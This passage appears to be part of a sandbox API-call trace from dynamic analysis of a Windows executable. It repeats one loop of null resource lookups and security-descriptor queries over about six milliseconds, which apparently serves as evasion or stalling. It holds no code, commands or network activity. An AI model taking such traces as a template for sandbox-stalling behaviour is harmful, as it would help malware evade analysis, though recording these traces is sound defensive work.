(hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.815] LockResource (hResData=0x0) returned 0x0 [0219.815] FreeResource (hResData=0x0) returned 0 [0219.815] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.815] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.815] LockResource (hResData=0x0) returned 0x0 [0219.815] FreeResource (hResData=0x0) returned 0 [0219.815] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.815] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.815] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.815] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.815] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.815] LockResource (hResData=0x0) returned 0x0 [0219.815] FreeResource (hResData=0x0) returned 0 [0219.815] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.815] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.815] LockResource (hResData=0x0) returned 0x0 [0219.815] FreeResource (hResData=0x0) returned 0 [0219.815] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.815] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.815] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.815] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.815] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.815] LockResource (hResData=0x0) returned 0x0 [0219.815] FreeResource (hResData=0x0) returned 0 [0219.815] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.815] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.815] LockResource (hResData=0x0) returned 0x0 [0219.815] FreeResource (hResData=0x0) returned 0 [0219.815] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.815] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.815] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.815] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.815] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.815] LockResource (hResData=0x0) returned 0x0 [0219.815] FreeResource (hResData=0x0) returned 0 [0219.816] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.816] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.816] LockResource (hResData=0x0) returned 0x0 [0219.816] FreeResource (hResData=0x0) returned 0 [0219.816] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.816] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.816] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.816] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.816] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.816] LockResource (hResData=0x0) returned 0x0 [0219.816] FreeResource (hResData=0x0) returned 0 [0219.816] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.816] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.816] LockResource (hResData=0x0) returned 0x0 [0219.816] FreeResource (hResData=0x0) returned 0 [0219.816] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.816] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.816] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.816] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.816] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.816] LockResource (hResData=0x0) returned 0x0 [0219.816] FreeResource (hResData=0x0) returned 0 [0219.816] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.816] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.816] LockResource (hResData=0x0) returned 0x0 [0219.816] FreeResource (hResData=0x0) returned 0 [0219.816] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.816] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.816] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.816] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.816] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.816] LockResource (hResData=0x0) returned 0x0 [0219.816] FreeResource (hResData=0x0) returned 0 [0219.816] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.816] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.816] LockResource (hResData=0x0) returned 0x0 [0219.816] FreeResource (hResData=0x0) returned 0 [0219.816] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.816] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.817] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.817] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.817] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.817] LockResource (hResData=0x0) returned 0x0 [0219.817] FreeResource (hResData=0x0) returned 0 [0219.817] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.817] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.817] LockResource (hResData=0x0) returned 0x0 [0219.817] FreeResource (hResData=0x0) returned 0 [0219.817] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.817] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.817] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.817] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.817] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.817] LockResource (hResData=0x0) returned 0x0 [0219.817] FreeResource (hResData=0x0) returned 0 [0219.817] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.817] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.817] LockResource (hResData=0x0) returned 0x0 [0219.817] FreeResource (hResData=0x0) returned 0 [0219.817] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.817] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.817] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.817] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.817] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.817] LockResource (hResData=0x0) returned 0x0 [0219.817] FreeResource (hResData=0x0) returned 0 [0219.817] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.817] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.817] LockResource (hResData=0x0) returned 0x0 [0219.817] FreeResource (hResData=0x0) returned 0 [0219.817] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.817] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.817] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.817] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.817] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.817] LockResource (hResData=0x0) returned 0x0 [0219.817] FreeResource (hResData=0x0) returned 0 [0219.817] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.817] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.817] LockResource (hResData=0x0) returned 0x0 [0219.817] FreeResource (hResData=0x0) returned 0 [0219.817] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.817] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.817] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.817] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.817] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.817] LockResource (hResData=0x0) returned 0x0 [0219.817] FreeResource (hResData=0x0) returned 0 [0219.818] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.818] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.818] LockResource (hResData=0x0) returned 0x0 [0219.818] FreeResource (hResData=0x0) returned 0 [0219.818] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.818] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.818] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.818] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.818] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.818] LockResource (hResData=0x0) returned 0x0 [0219.818] FreeResource (hResData=0x0) returned 0 [0219.818] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.818] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.818] LockResource (hResData=0x0) returned 0x0 [0219.818] FreeResource (hResData=0x0) returned 0 [0219.818] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.818] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.818] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.818] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.818] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.818] LockResource (hResData=0x0) returned 0x0 [0219.818] FreeResource (hResData=0x0) returned 0 [0219.818] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.818] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.818] LockResource (hResData=0x0) returned 0x0 [0219.818] FreeResource (hResData=0x0) returned 0 [0219.818] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.818] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.818] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.818] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.818] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.818] LockResource (hResData=0x0) returned 0x0 [0219.818] FreeResource (hResData=0x0) returned 0 [0219.818] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.818] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.818] LockResource (hResData=0x0) returned 0x0 [0219.818] FreeResource (hResData=0x0) returned 0 [0219.818] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.818] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.818] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.818] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.818] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.818] LockResource (hResData=0x0) returned 0x0 [0219.818] FreeResource (hResData=0x0) returned 0 [0219.818] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.818] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.818] LockResource (hResData=0x0) returned 0x0 [0219.818] FreeResource (hResData=0x0) returned 0 [0219.818] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.819] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.819] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.819] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.819] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.819] LockResource (hResData=0x0) returned 0x0 [0219.819] FreeResource (hResData=0x0) returned 0 [0219.819] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.819] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.819] LockResource (hResData=0x0) returned 0x0 [0219.819] FreeResource (hResData=0x0) returned 0 [0219.819] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.819] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.819] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.819] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.819] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.819] LockResource (hResData=0x0) returned 0x0 [0219.819] FreeResource (hResData=0x0) returned 0 [0219.819] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.819] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.819] LockResource (hResData=0x0) returned 0x0 [0219.819] FreeResource (hResData=0x0) returned 0 [0219.819] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.819] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.819] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.819] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.819] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.819] LockResource (hResData=0x0) returned 0x0 [0219.819] FreeResource (hResData=0x0) returned 0 [0219.819] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.819] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.819] LockResource (hResData=0x0) returned 0x0 [0219.819] FreeResource (hResData=0x0) returned 0 [0219.819] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.819] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.819] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.819] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.819] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.819] LockResource (hResData=0x0) returned 0x0 [0219.819] FreeResource (hResData=0x0) returned 0 [0219.819] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.819] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.819] LockResource (hResData=0x0) returned 0x0 [0219.819] FreeResource (hResData=0x0) returned 0 [0219.819] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.819] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.819] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.819] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.819] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.819] LockResource (hResData=0x0) returned 0x0 [0219.820] FreeResource (hResData=0x0) returned 0 [0219.820] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.820] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.820] LockResource (hResData=0x0) returned 0x0 [0219.820] FreeResource (hResData=0x0) returned 0 [0219.820] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.820] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.820] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.820] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.820] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.820] LockResource (hResData=0x0) returned 0x0 [0219.820] FreeResource (hResData=0x0) returned 0 [0219.820] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.820] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.820] LockResource (hResData=0x0) returned 0x0 [0219.820] FreeResource (hResData=0x0) returned 0 [0219.820] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.820] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.820] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.820] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.820] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.820] LockResource (hResData=0x0) returned 0x0 [0219.820] FreeResource (hResData=0x0) returned 0 [0219.820] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.820] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.820] LockResource (hResData=0x0) returned 0x0 [0219.820] FreeResource (hResData=0x0) returned 0 [0219.820] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.820] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.820] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.820] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.820] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.820] LockResource (hResData=0x0) returned 0x0 [0219.820] FreeResource (hResData=0x0) returned 0 [0219.820] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.820] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.820] LockResource (hResData=0x0) returned 0x0 [0219.820] FreeResource (hResData=0x0) returned 0 [0219.820] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.820] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.820] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.820] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.820] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.820] LockResource (hResData=0x0) returned 0x0 [0219.820] FreeResource (hResData=0x0) returned 0 [0219.820] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.820] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.820] LockResource (hResData=0x0) returned 0x0 [0219.820] FreeResource (hResData=0x0) returned 0 [0219.820] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.821] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.821] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.821] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.821] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.821] LockResource (hResData=0x0) returned 0x0 [0219.821] FreeResource (hResData=0x0) returned 0 [0219.821] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.821] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.821] LockResource (hResData=0x0) returned 0x0 [0219.821] FreeResource (hResData=0x0) returned 0 [0219.821] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.821] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.821] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.821] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.821] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.821] LockResource (hResData=0x0) returned 0x0 [0219.821] FreeResource (hResData=0x0) returned 0 [0219.821] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 